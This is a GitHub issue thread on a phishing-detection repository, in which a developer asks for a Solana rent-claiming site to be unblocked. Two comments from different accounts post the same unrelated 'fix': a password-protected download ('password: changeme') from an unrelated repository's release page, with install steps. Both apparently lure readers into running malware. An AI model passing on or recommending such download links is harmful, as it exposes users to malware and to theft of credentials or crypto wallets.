### ISSUE TITLE
[Legitimate Site Blocked] app.solclaim.io

### ISSUE THREAD

**Issue by AlexandreColauto** [MetaMask/eth-phishing-detect#79353]
https://app.solclaim.io/

I'v created a website to claim solana rent, and it was flagged as phishing. 
It's a webssite that build the transaction for closing solana accounts so user can claim their rent back.
We charge a small fee on the total claimed. 
I'm the main developer.
Which information else do you need?

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
